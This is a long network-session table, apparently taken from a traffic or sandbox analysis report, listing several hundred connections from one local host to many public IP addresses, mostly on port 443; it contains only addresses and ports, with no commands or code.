                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17447192.168.2.133381090.141.131.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17448192.168.2.1344982176.68.96.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17449192.168.2.1338326193.106.205.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17450192.168.2.1347524137.162.81.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17451192.168.2.13333464.114.190.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17452192.168.2.1348078125.21.8.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17453192.168.2.134354274.20.58.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17454192.168.2.135718891.155.100.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17455192.168.2.134404049.203.147.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17456192.168.2.1346020174.202.37.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17457192.168.2.13572742.140.21.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17458192.168.2.134757275.44.141.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17459192.168.2.1341964101.148.159.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17460192.168.2.1358752142.13.33.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17461192.168.2.1349196124.69.125.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17462192.168.2.1342046121.164.61.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17463192.168.2.133893887.120.105.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17464192.168.2.1345182182.182.62.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17465192.168.2.1336670136.47.23.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17466192.168.2.1349674185.250.87.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17467192.168.2.136035880.181.210.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17468192.168.2.1360314206.70.97.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17469192.168.2.1338922100.162.16.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17470192.168.2.1336198187.7.47.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17471192.168.2.1357208179.205.244.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17472192.168.2.1357172220.220.81.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17473192.168.2.133378679.166.217.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17474192.168.2.1335606171.214.196.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17475192.168.2.135864894.63.242.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17476192.168.2.1336732153.141.147.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17477192.168.2.1358626143.244.131.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17478192.168.2.1339260142.35.161.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17479192.168.2.1351358206.54.244.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17480192.168.2.1352826130.254.150.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17481192.168.2.1333456199.236.218.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17482192.168.2.1350650113.180.140.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17483192.168.2.133642452.161.121.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17484192.168.2.13329881.48.208.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17485192.168.2.1334362104.18.96.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17486192.168.2.13498428.202.178.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17487192.168.2.1355702173.245.152.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17488192.168.2.1352498108.152.235.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17489192.168.2.133417470.205.223.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17490192.168.2.134565296.11.234.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17491192.168.2.1338294206.156.100.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17492192.168.2.1333344156.254.159.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17493192.168.2.134585466.17.166.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17494192.168.2.1341362206.20.33.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17495192.168.2.1335900188.107.131.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17496192.168.2.135521843.181.62.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17497192.168.2.1338694218.155.29.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17498192.168.2.1347728191.34.53.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17499192.168.2.134920838.66.160.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17500192.168.2.134526475.239.208.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17501192.168.2.133337682.226.140.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17502192.168.2.1347220185.18.240.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17503192.168.2.135915437.234.188.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17504192.168.2.1349044134.17.251.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17505192.168.2.1341762204.1.67.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17506192.168.2.133490291.3.251.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17507192.168.2.1342300178.165.52.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17508192.168.2.133732462.176.171.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17509192.168.2.1333904125.253.228.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17510192.168.2.1354376204.214.25.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17511192.168.2.134396031.178.200.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17512192.168.2.1339136192.143.140.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17513192.168.2.1334110196.33.109.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17514192.168.2.135859042.241.183.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17515192.168.2.134936668.29.123.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17516192.168.2.134947476.252.138.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17517192.168.2.135015214.110.156.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17518192.168.2.1337034130.212.64.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17519192.168.2.133543249.31.59.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17520192.168.2.135543453.164.129.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17521192.168.2.135197627.88.93.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17522192.168.2.135500283.61.228.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17523192.168.2.1348086164.154.113.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17524192.168.2.1333742135.74.133.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17525192.168.2.133636696.103.167.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17526192.168.2.1343124223.200.215.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17527192.168.2.133780891.178.21.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17528192.168.2.1349654180.117.213.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17529192.168.2.135687434.161.102.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17530192.168.2.1333696129.193.155.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17531192.168.2.134542423.19.59.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17532192.168.2.1358942109.57.132.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17533192.168.2.1342372181.43.162.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17534192.168.2.133703053.8.117.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17535192.168.2.1334082116.21.210.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17536192.168.2.1356884105.221.121.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17537192.168.2.133883272.47.233.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17538192.168.2.135112614.89.246.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17539192.168.2.1342256197.53.187.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17540192.168.2.1337484125.223.149.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17541192.168.2.1346518124.173.152.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17542192.168.2.135168486.198.222.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17543192.168.2.1354684118.148.189.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17544192.168.2.1340314197.229.42.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17545192.168.2.134583217.248.223.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17546192.168.2.135314098.25.134.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17547192.168.2.1346904134.97.132.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17548192.168.2.134397276.50.101.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17549192.168.2.135785039.181.12.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17550192.168.2.1346832118.218.114.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17551192.168.2.1344962113.159.224.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17552192.168.2.1357960210.55.142.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17553192.168.2.134781484.166.72.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17554192.168.2.1343724111.219.163.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17555192.168.2.1356556104.211.79.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17556192.168.2.133619079.89.121.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17557192.168.2.134458483.242.52.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17558192.168.2.1360968195.254.244.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17559192.168.2.1350400139.177.18.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17560192.168.2.1355156102.199.14.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17561192.168.2.133863685.113.195.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17562192.168.2.135088869.151.217.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17563192.168.2.1344488183.158.32.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17564192.168.2.135254234.15.141.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17565192.168.2.135046494.219.152.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17566192.168.2.133671473.24.167.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17567192.168.2.1359678109.102.216.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17568192.168.2.134006081.208.173.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17569192.168.2.134007632.204.148.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17570192.168.2.1333984203.50.95.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17571192.168.2.135175851.102.227.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17572192.168.2.133349448.195.104.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17573192.168.2.134097268.69.248.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17574192.168.2.135750653.105.243.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17575192.168.2.1335876140.69.200.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17576192.168.2.1345058171.13.81.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17577192.168.2.1358408116.38.137.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17578192.168.2.1360422112.167.42.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17579192.168.2.1341780141.159.43.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17580192.168.2.133546227.5.93.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17581192.168.2.1339774149.215.22.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17582192.168.2.1346586203.21.88.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17583192.168.2.13596961.240.199.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17584192.168.2.136095680.227.121.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17585192.168.2.135062827.58.223.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17586192.168.2.1356970217.246.86.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17587192.168.2.135502231.0.180.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17588192.168.2.1337884205.190.188.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17589192.168.2.133653639.81.3.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17590192.168.2.134263884.170.191.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17591192.168.2.1344036207.50.167.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17592192.168.2.1356648191.53.41.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17593192.168.2.1352386144.163.72.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17594192.168.2.1349086144.83.202.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17595192.168.2.133801665.134.231.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17596192.168.2.1347418209.89.102.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17597192.168.2.1337700111.85.218.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17598192.168.2.1338998188.118.41.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17599192.168.2.134257684.200.88.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17600192.168.2.135709249.3.89.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17601192.168.2.136051040.42.21.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17602192.168.2.1334692117.2.190.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17603192.168.2.136018645.185.189.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17604192.168.2.1344436199.164.93.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17605192.168.2.135400414.90.108.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17606192.168.2.1346110109.160.232.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17607192.168.2.135686698.67.29.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17608192.168.2.1347492197.234.41.5537215
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17609192.168.2.13586042.193.38.1368080
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17610192.168.2.1338186208.165.77.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17611192.168.2.1349886206.14.193.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17612192.168.2.135139013.35.211.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17613192.168.2.1346672174.124.130.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17614192.168.2.1337930223.159.214.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17615192.168.2.1358814120.21.207.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17616192.168.2.135291619.98.64.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17617192.168.2.1333678157.244.144.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17618192.168.2.134333035.109.232.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17619192.168.2.135254460.46.213.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17620192.168.2.133655469.153.142.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17621192.168.2.1345458167.129.7.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17622192.168.2.133815454.152.145.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17623192.168.2.134874458.191.242.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17624192.168.2.135259475.32.173.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17625192.168.2.134492489.200.188.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17626192.168.2.1341780102.227.67.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17627192.168.2.134537090.52.215.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17628192.168.2.1338976199.182.53.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17629192.168.2.1346026220.64.192.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17630192.168.2.133546885.189.196.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17631192.168.2.1350700203.138.108.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17632192.168.2.134980493.170.155.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17633192.168.2.1343238191.109.189.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17634192.168.2.1334914147.243.164.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17635192.168.2.135406045.171.95.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17636192.168.2.1345916159.113.171.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17637192.168.2.133283462.148.165.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17638192.168.2.1360876119.243.228.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17639192.168.2.135560879.167.71.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17640192.168.2.134097262.216.89.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17641192.168.2.134026686.146.189.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17642192.168.2.1349130172.142.164.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17643192.168.2.135107293.187.76.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17644192.168.2.134430078.32.216.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17645192.168.2.1359838201.97.71.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17646192.168.2.1342360150.100.162.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17647192.168.2.1347556189.212.106.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17648192.168.2.1357786145.21.178.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17649192.168.2.134996832.224.174.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17650192.168.2.1338552162.146.102.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17651192.168.2.1354832114.182.216.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17652192.168.2.134868023.39.202.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17653192.168.2.133548249.191.163.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17654192.168.2.1339132105.32.140.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17655192.168.2.1348906217.212.100.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17656192.168.2.1344058202.54.135.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17657192.168.2.134119264.32.183.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17658192.168.2.1351910132.35.80.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17659192.168.2.134093817.52.77.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17660192.168.2.1342704178.111.252.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17661192.168.2.133808068.52.223.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17662192.168.2.134404652.252.95.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17663192.168.2.1335990220.252.125.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17664192.168.2.133736482.14.212.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17665192.168.2.1357172136.235.47.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17666192.168.2.1354870166.153.191.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17667192.168.2.135656284.124.81.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17668192.168.2.135369695.207.87.183443
